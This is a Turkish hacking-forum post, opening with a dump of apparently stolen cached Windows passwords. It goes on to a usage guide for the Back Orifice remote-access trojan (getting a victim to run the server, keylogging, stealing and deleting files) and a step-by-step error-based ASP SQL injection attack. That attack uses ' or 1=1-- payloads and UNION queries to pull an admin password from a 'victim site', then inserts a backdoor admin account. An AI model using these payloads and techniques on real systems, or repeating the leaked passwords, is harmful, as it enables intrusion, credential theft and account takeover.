index:22(06) len:36(22/62)
Resource: '*Rna\Bağlantım 4\merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*Rna\Bağlantım 7\ baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rna\bayrak\baycenk' Password: ' ‑'
index:14(06) len:30(16/52)
Resource: '*Rna\Burak\burak' Password: 'burakì‑'
index:12(06) len:30(16/62)
Resource: '*Rna\Alnet\merko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rna\cenk\baycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
------------------------- End of Data -------------------

BACKORIFICE VE KULLANIMI
Karsi pclere saldirmak için yapilmis bir program. Program hem cok basit kullanimi bunun yaninda çok islevli olmasi en büyük özelligi. Backorifice sayesinde karsi pc nin internet sifresinden.... ekran koruyucu sifresine kadar bir çok sifresini çalabilirsiniz. Pc ye reset atabilir.Dosyalari üzerinde istediginiz degisikligi yapabilirsiniz...

Sitemden çekmis oldugunuz backorifice daki dosyalari taniyalim ;

Boserve.exe: Server programi. Yani karsi pc ye yollamamiz gereken dosya.

Bogui.exe: Kendi kullanacagimiz dosya.

Bocilient.exe: Programin dos versiyonu (ben bunu tavsiye ederim)

Boconfig.exe: Programin ayarlarinin yapildigi dosya

Nasil Baglanacagim?

Karsi pc ye server dosyasini açtirdikdan sonra Command bolumunden ping host 'i seçiyoruz ve send e tikliyoruz. Baglandigimiza dair biseyler gelirse (merak etmeyin eger baglanirsaniz mutlaka anlarsiniz unlemli 3-4 satir bi yazi cikar) kisinin pc sindeyiz demektir neler mi yapabiliriz?

Directory List: Klasörleri listeler unused (soldaki) bolume yolu yaziyoruz.

Directory Create: Klasör olusturur. Unused (soldaki) bölümüne olusturulacak klasoru yazin.

Directory Remove: Klasör siler. Unused (soldaki) yolu yazin.

File Copy: Dosya kopyalamak için Unused (soldaki) 'e kaynak dosyayi. Unused(sagdaki) 'e hedef dosyayi yazin.

File Delete: Dosya silmek için. Unused (soldaki) dosya adini yazin.

File Find: Dosya bulmak için.

Keylog Begin: Kayit dosyasi. Unused (soldaki) 'e dosyanin adini yazin.

Mm Play Sound: Wav dosyalarini caliltirmak için. Unused (soldaki) dosyanin adi ve yolunu yazin.

Syetem Dialog Box: Mesaj için. Unused (soldaki) 'e mesajinizi Unused (sagdaki) mesaj kutusunun basligini yazin.

System Info: Pc nin sistemi hakkinda bilgi verir.

System Reboot: Reset attirir

Tcp File Recieve: Dosya indirmek için. Unused (sol) a dosya adi unused (sag) hedef dosya : port

Pcp File Send: Dosya yollamak için. Unused (sol) a dosya adi unused (sag) hedef dosya : port

Bo Client

Bunlarin disinda boclient.exe adli dosya ile de baglanabiliriz
ASP SQL ENJEKSIYON
ASP Sql Enjeksiyon a geçmeden önce bir kaç temel kavrama bakalim;
Database = Veritabani Nedir :
Veritabani verilerimizin düzenli olarak saklandigi dijital bir
ortamdir. Verilerimizi anlamli kilmak da bizim bilfimizi olusturur.
Veritabani Programlari:
Günümüzde, birçok firmanin ürettigi db programlari mevcuttur... Ama
bunlarin en bilinenleri ORACLE , SQL SERVER, MS ACCESS, FOX PRO'dur.


SQL Nedir :

Sql (Structured Query Language) bir veritabani dilidir.Uygulama
gelistiriciler, bir veritabanina yeni tablo veya veri eklerken,
silerken veya bir veriyi ararken bu dili kullanirlar.
Bu anlamda genis kabul görmüs bir standarttir. Örnegin MS ACCESS'te
bunu yapmanin baska yöntemleri de olsa, sonuçta Sql karsiligi her
zaman vardir. Örnek bir Sql ifadesi yazalim;
diyelim ki xchatx tablosundan Hack isimli dökümanin fiyatini bize
bulsun Sql da sorgulamalar SELECT ile yapilir Bu sorgu yazilisi ;

SELECT fiyat FROM xchatx WHERE dokuman ismi="hack"

SELECT deyiminden sonraki gelen ilk ifade, sorgunun sonundaki WHERE
kriterine göre tespit edilen kriterlerin hangi alanlarinin
görüntülenecegi bilgisidir. FROM deyiminden sonraki ifade,
sorgulkamanin hangi tablodan yapilacagini bildirir. WHERE deyimi
ise , sorgulamanin hangi kriter ya da kriterlere göre yapilacagini
belirtmemizi saglar.

Iste SQL ENJEKSIYON DA ILK BASTA SITENIN DB sindeki TABLO Ismini
bilmemiz gerekmez mi sizce yoksa SELECT WHERE Falan nasi kullanalim
o nedenle SqL a ilk basta hata verdirip Tablo ismini ögrenmeliyiz.

SQL Hata verdirtmek için sunlar yapilabilir:

Asp sql enjeksiyondan bahsedecegim

Asp sitemizin tabiki db si ve sql si olan search engine ya da
login barina :

Bunu yaziyoruz Egeeer :

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value ’xchatx1’ to a column of data type
int.

/index.asp, line 29
Burda illa da line 29 ve index.asp olmak zorunda degil tipa tip
aynisi olmayacak elbette sadece Sytntax error oracle falan çikmasi
lazim...
Baska türlü de sql a hata verdirebilirsiniz :

’ or 1=1--

" or 1=1--

’ or ’a’=’a

or 1=1--

’) or (’a’=’a

" or "a"="a
Bunlari da aynene deneyin ...
simdi o hatayi aldik da ne oldu diyorsaniz orda TABLE ismini
ögrendik xchatx1 table namemimiz.

Simdi burdan diger tablolarinda ismini ögrenmemiz lazim...

SELECT* FROM xchatx1 WHERE dokumanID=’’ or 1=1--’

Burda yaptigimiz sey bize xchatx1 table inda dokumanIDsi bos olan
seyi getir ya da 1=1 degerine uyan tabloyu getir dedik burda feyk
attik SQL a yani.
Burdan diger table isimlerini de ögreniriz. Sonra istedigimiz seyi
SELECT WHERE deyimlerini kullanarak getiririz. Önümüze...


Simdi örnek bi saldiri yapalim ve yeni seyler ögrenelim biraz daha :

ilk önce kurban siteyi seçtik....

Baktik sql açigi da var ’ bu isaret ile test ettik açik var yani.

[Linkleri görebilmek için üye olun veya giriş yapın.] UNION SELECT TOP 1
TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

UNION SQL a birden çok soru sormak için kullandik.

INFORMATION_SCHEMA.TABLES-- ise hiç table ismi bilmedigimiz için
yazdik

Top 1 table_name ise en üstteki tablo anlamina geliyor.

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value ’serles’ to a column of data type int.
/index.asp, line 23
Hatamizi aldik
Top 1 table_name serles mis!!

Simdi isimize yarayacak tablelari ögrenelim mesela admin table
larini burda da LIKE deyimini kullanicaz içinde admin geçen
kelimeleri getir bize SQL!!! dicez

[Linkleri görebilmek için üye olun veya giriş yapın.] UNION SELECT TOP 1
TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ’%
25admin%25’--

Hatayi aliyoruz :

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value ’admins’ to a column of data type int.
/index.asp, line 3

Burda admin diye baslayan admins diye bir table var. Simdi bu admins
table inin column yani sutünlarini ögrenme zamani!

Kodu yaziyoruz : [Linkleri görebilmek için üye olun veya giriş yapın.] UNION
SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME LIKE = ’admins’--
Burada da INFORMATION_SCHEMA.TABLES yerine
INFORMATION_SCHEMA.COLUMNS deyimini yazdik. Yani yine feyk attik
sql’e, o da bu feykimizi yedi:

Hatayi alalim :

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value ’logonID’ to a column of data type
int.
/index.asp, line 22
ilk kolum LogonID çikti
Simdi 2. sütünü istiyoruz :
[Linkleri görebilmek için üye olun veya giriş yapın.] UNION SELECT TOP 1
COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME=’admins’ WHERE COLUMN_NAME NOT IN (’logonID’)--
Burda en tepede olan ama LogonID olmayani istedik ve hatayi görelim:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value ’logs’ to a column of data type int.
Ögrendik adi logs.
Artik sifre neredeyse geliyor kucagimiza
Önce Password ve detaillarina bakicaz.
[Linkleri görebilmek için üye olun veya giriş yapın.] UNION SELECT TOP 1
COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME=’admins’ WHERE COLUMN_NAME NOT IN
(’logonID’,’logs’,’password’,details’)--
Hata : Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’ [Microsoft][ODBC sql Server Driver][sql Server]ORDER BY items must
appear in the select list if the statement contains a UNION
operator.
/index.asp, line 4
iki sütün var sansimiza güvenelim ilk logonu deneyelim :
[Linkleri görebilmek için üye olun veya giriş yapın.] UNION SELECT TOP 1 logon
FROM admins--
admins table indaki logon sütunundaki ilk ini seçiyoruz.
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value ’xrealcrack’ to a column of data type
int.
/index.asp, line 7
ve admin nick geldi.
xrealcrack isimli kullanicinin sifresini ver bize SQL :
[Linkleri görebilmek için üye olun veya giriş yapın.] UNION SELECT TOP 1 password
FROM admins where logon=’ xrealcrack ’--
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value ’albert8387vsc’ to a column of data
type int.
/index.asp, line 4
Sifremizi aldik albert8387vsc ok artik hackledik..
Kendimiz de kullanici yaratabiliriz admins table inda logon column
ünde
Kodu : [Linkleri görebilmek için üye olun veya giriş yapın.] INSERT
INTO ’admins’ (’logonID’, ’logon’, ’password’, ’details’) VALUES
(223,’SwmeRt’,’123456’,’NA’)--
SwmeRt nickli bi admin olusturduk sifresi de : 123456 iste bu
kadar...

::::Türkün dostlugu kıymetlidir ! Düşmanlıgı ise çok şiddetlidir:::::HaCkEr oo1:::::
[Linkleri görebilmek için üye olun veya giriş yapın.]

[Linkleri görebilmek için üye olun veya giriş yapın.]

[Linkleri görebilmek için üye olun veya giriş yapın.]
avatar
el-perest
GENEL BÖLÜM
GENEL BÖLÜM

Mesaj Sayısı : 69
rep-puan : 2147486486
Rep Puan : 2
Kayıt tarihi : 07/09/10

Oyun Sayfası
Oyun Alanı:

Kullanıcı profilini gör http://www.hackeroo1.yetkin-forum.com----http://www.sohbetcidost

Sayfa başına dön Aşağa gitmek

Sayfa başına dön


 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz